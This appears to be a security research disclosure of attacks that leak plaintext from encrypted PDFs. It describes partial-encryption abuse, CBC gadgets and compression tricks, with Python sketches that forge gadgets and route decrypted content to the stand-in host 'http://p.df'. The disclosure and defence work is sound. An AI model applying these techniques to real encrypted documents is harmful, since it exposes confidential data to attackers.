In the given example, the attacker abuses the flexibility of the PDF encryption standard to define certain objects as unencrypted. The attacker modifies the Encrypt dictionary (6 0 obj) in a way that the document is partially encrypted – all streams are left AES256 encrypted while strings are defined as unencrypted by setting the Identity filter. Thus, the attacker can freely modify strings in the document and add additional objects containing unencrypted strings.
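To make the partial-encryption setup concrete, the following minimal sketch inspects the text of an Encrypt dictionary and reports which crypt filter is assigned to strings and which to streams. The helper name `crypt_filter_summary` and the sample dictionary are assumptions made for illustration (the sample is modeled on the description above, not copied from the example file), and the regex lookup is a simplification rather than a real PDF parser.

```python
import re

def crypt_filter_summary(encrypt_dict: str) -> dict:
    """Report the crypt filters named by /StrF and /StmF in an Encrypt dictionary.

    Hypothetical helper: a plain regex lookup, not a full PDF parser.
    """
    def lookup(key: str) -> str:
        match = re.search(r"/" + key + r"\s*/(\w+)", encrypt_dict)
        # Assumption: a missing key falls back to the Identity (no-op) filter.
        return match.group(1) if match else "Identity"

    strings, streams = lookup("StrF"), lookup("StmF")
    return {
        "StrF": strings,
        "StmF": streams,
        # "mixed" means exactly one of the two is left unencrypted.
        "mixed": (strings == "Identity") != (streams == "Identity"),
    }

# Illustrative dictionary: streams use an AES-256 filter, strings use Identity.
sample = (
    "<< /Filter /Standard /V 5 /R 6 "
    "/CF << /StdCF << /CFM /AESV3 /Length 32 >> >> "
    "/StmF /StdCF /StrF /Identity >>"
)
summary = crypt_filter_summary(sample)
print(summary)
```

A document flagged as `mixed` is not necessarily malicious, since partial encryption is standard compliant, but it is exactly the configuration this attack relies on.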
This attack has three requirements to be successful. While all requirements are PDF standard compliant, they have not necessarily been implemented by every PDF application:
Please note that the attack does not abuse any cryptographic weakness, so it places no requirements on the underlying encryption algorithm (e.g., AES) or the encryption mode (e.g., CBC).
In the following, we show three techniques an attacker can use to exfiltrate the content.
The PDF standard allows a document’s encrypted streams or strings to be defined as values of a PDF form to be submitted to an external server. This can be done by referencing their object numbers as the values of the form fields within the Catalog object, as shown in the example on the left side. The value of the PDF form points to the encrypted data stored in 2 0 obj.
To make the form submit itself automatically once the document is opened and decrypted, an OpenAction can be applied. Note that the object which contains the URL (http://p.df) for form submission is not encrypted and is completely controlled by the attacker. As a result, as soon as the victim opens the PDF file and decrypts it, the OpenAction is executed and sends the decrypted content of 2 0 obj to (http://p.df).
If forms are not supported by the PDF viewer, there is a second method to achieve direct exfiltration of a plaintext. The PDF standard allows setting a “base” URI in the Catalog object used to resolve all relative URIs in the document.
This enables an attacker to define the encrypted part as a relative URI to be leaked to the attacker’s web server. The base URI is prepended to each relative URI called within the PDF file, so the decrypted content ends up in the requested URL. In the given example, we set the base URI to (http://p.df).
The plaintext can be leaked by clicking on a visible element such as a link, or without user interaction by defining a URI Action to be automatically performed once the document is opened.
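The effect of the base URI can be illustrated outside of any PDF viewer. The sketch below uses Python's standard `urllib.parse` to resolve a relative URI against the base from the example. The function name `resolve_relative` and the sample plaintext are assumptions for illustration, and real viewers may encode or resolve URIs differently.

```python
from urllib.parse import quote, urljoin

BASE_URI = "http://p.df"  # base URI taken from the example in the text

def resolve_relative(base: str, decrypted: bytes) -> str:
    """Resolve decrypted string content as a relative URI against the base.

    Hypothetical helper: percent-encodes the content, then joins it to the base.
    """
    return urljoin(base, quote(decrypted, safe=""))

# Placeholder for the content of a decrypted string object.
leaked_url = resolve_relative(BASE_URI, b"Confidential content")
print(leaked_url)
```

Whoever operates the server behind the base URI sees the decrypted string as the request path.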
In the given example, we define the base URI within an Object Stream, which allows objects of arbitrary type to be embedded within a stream. This construct is a standard compliant method to put unencrypted and encrypted strings within the same document. Note that for this attack variant, only strings can be exfiltrated due to the specification, but not streams; (relative) URIs must be of type string. However, fortunately (from an attacker’s point of view), all encrypted streams in a PDF document can be re-written and defined as hex-encoded strings using the
Nevertheless, the attack has some notable drawbacks compared to Exfiltration via PDF Forms:
Not all PDF viewers support partially encrypted documents, which makes them immune to direct exfiltration attacks. However, because PDF encryption generally defines no authenticated encryption, attackers may use CBC gadgets to exfiltrate plaintext. The basic idea is to modify the plaintext data directly within an encrypted object, for example, by prefixing it with a URL. The CBC gadget attack thus does not necessarily require cross-object references.
Note that all gadget-based attacks modify existing encrypted content or create new content from CBC gadgets. This is possible due to the malleability property of the CBC encryption mode.
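The malleability property can be demonstrated with a short, self-contained sketch. Because the Python standard library ships no AES implementation, the block cipher here is a toy 16-byte Feistel construction built from HMAC-SHA256. This is an assumption made purely for illustration, since CBC malleability does not depend on which block cipher is used. All names (`build_gadget`, `KNOWN`, `CHOSEN`) and the sample values are hypothetical.

```python
import hashlib
import hmac
import os

BLOCK = 16  # same block size as AES; the cipher below is a toy stand-in

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _round(key, rnd, right))
    return left + right

def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _round(key, rnd, left)), left
    return left + right

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, xor(prev, plaintext[i:i + BLOCK]))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += xor(prev, decrypt_block(key, block))
        prev = block
    return out

def build_gadget(prev_block: bytes, known: bytes, chosen: bytes) -> bytes:
    """Alter the preceding ciphertext block so the next block decrypts to `chosen`."""
    assert len(known) == len(chosen) <= BLOCK
    n = len(known)
    return xor(prev_block[:n], xor(known, chosen)) + prev_block[n:]

key, iv = os.urandom(16), os.urandom(16)
KNOWN = b"KNOWN-12BYTE"    # 12 known plaintext bytes (placeholder value)
CHOSEN = b"http://p.df/"   # 12 attacker-chosen bytes
unknown_tail = os.urandom(4)
ciphertext = cbc_encrypt(key, iv, os.urandom(BLOCK) + KNOWN + unknown_tail)

# The attacker never touches the key: only ciphertext block 0 is modified.
forged = build_gadget(ciphertext[:BLOCK], KNOWN, CHOSEN) + ciphertext[BLOCK:]
tampered = cbc_decrypt(key, iv, forged)
print(tampered[BLOCK:BLOCK + 12])  # the chosen prefix
```

In this sketch the modified block itself decrypts to 16 unpredictable bytes and the last 4 bytes of the target block stay unknown, which matches the 20 random bytes per gadget discussed later in the text.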
This attack has two necessary preconditions:
These requirements differ from those of the direct exfiltration attacks, because the attacks are applied "through" the encryption layer and not outside of it.
As described above, PDF allows the submission of string and stream objects to a web server. This can be used in conjunction with CBC gadgets to leak the plaintext to an attacker-controlled server, even if partial encryption is not allowed.
A CBC gadget constructed from the known plaintext can be used as the submission URL, as shown in the example on the left side. The construction of this particular URL gadget is challenging. As PDF encryption uses PKCS#5 padding, constructing the URL using a single gadget from the known Perms plaintext is difficult, as the last 4 bytes that would need to contain the padding are unknown.
However, we identified two techniques to solve this. On the one hand, we can take the last block of an unknown ciphertext and append it to our constructed URL, essentially reusing the correct PKCS#5 padding of the unknown plaintext. Unfortunately, this would introduce 20 bytes of random data from the gadgeting process and up to 15 bytes of the unknown plaintext to the end of our URL.
On the other hand, the PDF standard allows the execution of multiple OpenActions in a document, allowing us to essentially guess the last padding byte of the Perms value. This is possible by iterating over all 256 possible values of the last plaintext byte until it becomes 0x01, resulting in a URL with as few random bytes as possible (3 bytes). As a limitation, if one of the 3 random bytes is a special character, the form submission URL might break.
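The arithmetic behind the guessing step is small enough to sketch directly. For every guess of the unknown last plaintext byte, the attacker derives an XOR mask that would turn that byte into 0x01, which is a valid one-byte padding. Exactly one of the 256 masks succeeds. The function names and the sample byte value below are assumptions for illustration, and applying each mask to the ciphertext (one candidate per OpenAction) is left out.

```python
VALID_PADDING = 0x01  # a single padding byte with value 1

def candidate_masks() -> list:
    """One XOR mask per guess: mask = guess ^ 0x01 maps a byte equal to guess to 0x01."""
    return [guess ^ VALID_PADDING for guess in range(256)]

def successful_guesses(unknown_last_byte: int) -> list:
    """Return the guesses whose mask yields valid padding for the given byte."""
    return [
        guess
        for guess, mask in enumerate(candidate_masks())
        if unknown_last_byte ^ mask == VALID_PADDING
    ]

# Hypothetical unknown byte; the attacker does not know this value in advance.
hits = successful_guesses(0xA7)
print(hits)
```

Only the candidate that matches the real byte produces valid padding, so only the corresponding submission is well-formed.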
Using CBC gadgets, encrypted plaintext can be prefixed with one or more chosen plaintext blocks. An attacker can construct URLs in the encrypted PDF document that contain the plaintext to exfiltrate. This attack is similar to the exfiltration hyperlink attack (A2). However, it does not require the setting of a “base” URI in plaintext to achieve exfiltration.
The same limitations described for direct exfiltration based on links (A2) apply. Additionally, the constructed URL contains random bytes from the gadgeting process, which may prevent the exfiltration in some cases.
While CBC gadgets are generally restricted to the block size of the underlying block cipher – and more specifically the length of the known plaintext, in this case, 12 bytes – longer chosen plaintexts can be constructed using compression. Deflate compression, which is available as a filter for PDF streams, allows writing both uncompressed and compressed segments into the same stream. The compressed segments can reference back to the uncompressed segments and achieve the repetition of byte strings from these segments. These backreferences allow us to construct longer continuous plaintext blocks than CBC gadgets would typically allow for. Naturally, the first uncompressed occurrence of a byte string still appears in the decompressed result. Additionally, if the compressed stream is constructed using gadgets, each gadget generates 20 random bytes that appear in the decompressed stream. A non-trivial obstacle is to keep the PDF viewer from interpreting these fragments in the decompressed stream. While hiding the fragments in comments is possible, PDF comments are single-line and are thus susceptible to newline characters in the random bytes. Therefore, in reality, the length of constructed compressed plaintexts is limited.
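The mix of uncompressed and compressed segments can be reproduced with Python's `zlib`. In the sketch below, a hand-built stored (uncompressed) Deflate block carries a seed string, and a compressed segment that follows it refers back to that seed. To produce the compressed segment we prime the compressor with the seed as a preset dictionary. That is a convenience chosen for this illustration and not necessarily how such streams are built in the attack. The names `stored_block` and `compressed_tail` are hypothetical.

```python
import struct
import zlib

def stored_block(data: bytes, final: bool = False) -> bytes:
    """Build one uncompressed Deflate block (BTYPE=00) holding `data`."""
    assert len(data) <= 0xFFFF
    header = b"\x01" if final else b"\x00"
    # LEN and its one's complement NLEN, both little-endian.
    return header + struct.pack("<HH", len(data), len(data) ^ 0xFFFF) + data

def compressed_tail(seed: bytes, payload: bytes) -> bytes:
    """Compress `payload` as raw Deflate, allowed to back-reference `seed`."""
    comp = zlib.compressobj(level=9, wbits=-15, zdict=seed)
    return comp.compress(payload) + comp.flush()

seed = b"http://p.df/"    # bytes that appear once, uncompressed
payload = seed * 4        # repetitions expressed via the compressed segment
stream = stored_block(seed) + compressed_tail(seed, payload)

# Decode the whole thing as a single raw Deflate stream, without a dictionary.
result = zlib.decompress(stream, -15)
print(len(stream), len(result))
```

As noted above, the seed still appears once in the decompressed output, followed by the repeated data.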
To deal with this caveat, an attacker can use ObjectStreams which allow the storage of arbitrary objects inside a stream. The attacker uses an object stream to define new objects using CBC gadgets. An object stream always starts with a header of space-separated integers which define the object number and the byte offset of the object inside the stream. The dictionary of an object stream contains the key First which defines the byte offset of the first object inside the stream. An attacker can use this value to create a comment of arbitrary size by setting it to the first byte after their comment.
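The role of the First key can be seen in a simplified reader for object streams. The sketch below takes the decoded stream content, the number of objects, and the First offset, and shows that bytes placed between the header and First are never interpreted, even if they contain newlines. The function name, the sample objects, and the filler bytes are assumptions for illustration, and the parsing is far less strict than a real PDF library.

```python
def parse_object_stream(data: bytes, count: int, first: int) -> dict:
    """Split a decoded object stream into {object number: raw object bytes}.

    Simplified sketch: reads `count` (number, offset) pairs from the header
    and ignores everything else before the byte offset `first`.
    """
    tokens = data[:first].split()[: 2 * count]
    numbers = [int(token) for token in tokens]
    pairs = list(zip(numbers[0::2], numbers[1::2]))
    objects = {}
    for index, (obj_num, offset) in enumerate(pairs):
        start = first + offset
        # An object ends where the next one starts, or at the end of the stream.
        end = first + pairs[index + 1][1] if index + 1 < len(pairs) else len(data)
        objects[obj_num] = data[start:end].strip()
    return objects

header = b"11 0 12 9 "                  # object 11 at offset 0, object 12 at offset 9
filler = b"\x8f\n\x03 random\nbytes "   # stands in for uninterpretable fragments
body = b"(string) << /A 1 >>"
stream_data = header + filler + body

parsed = parse_object_stream(stream_data, count=2, first=len(header) + len(filler))
print(parsed)
```

Because object offsets are counted from First, the filler region can be of any length and contain any bytes without affecting the parsed objects.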
Using compression has the additional advantage that compressed, encrypted plaintexts from the original document can be embedded into the modified object. As PDF applications often create compressed streams, these can be incorporated into the attacker-created compressed object and will therefore be decompressed by the PDF applications. This is a significant advantage over leaking the compressed plaintexts without decompression, as the compressed bytes are often not URL-encoded correctly (or at all) by the PDF applications, leading to incomplete or incomprehensible plaintexts. However, due to the inner workings of the Deflate algorithm, a complete compressed plaintext can only be prefixed with new segments, not postfixed. Therefore, a string created using this technique cannot be terminated with a closing bracket, which leaves a half-open string. This is not a standard compliant construction, and PDF viewers should not accept it. However, a majority of PDF viewers accept it anyway.
During our security analysis, we identified two standard compliant attack classes which break the confidentiality of encrypted PDF files. Our evaluation shows that among 27 widely-used PDF viewers, all of them are vulnerable to at least one of those attacks, including popular software such as Adobe Acrobat, Foxit Reader, Evince, Okular, Chrome, and Firefox.
You can find the detailed results of our evaluation here.
First, many data formats allow only parts of the content to be encrypted (e.g., XML, S/MIME, PDF). This encryption flexibility is difficult to handle and allows an attacker to include their own content, which can lead to exfiltration channels.
Second, when it comes to encryption, AES-CBC – or encryption without integrity protection in general – is still widely supported. Even the latest PDF 2.0 specification released in 2017 still relies on it. This must be fixed in future PDF specifications and any other format encryption standard, without enabling backward compatibility that would re-enable CBC gadgets.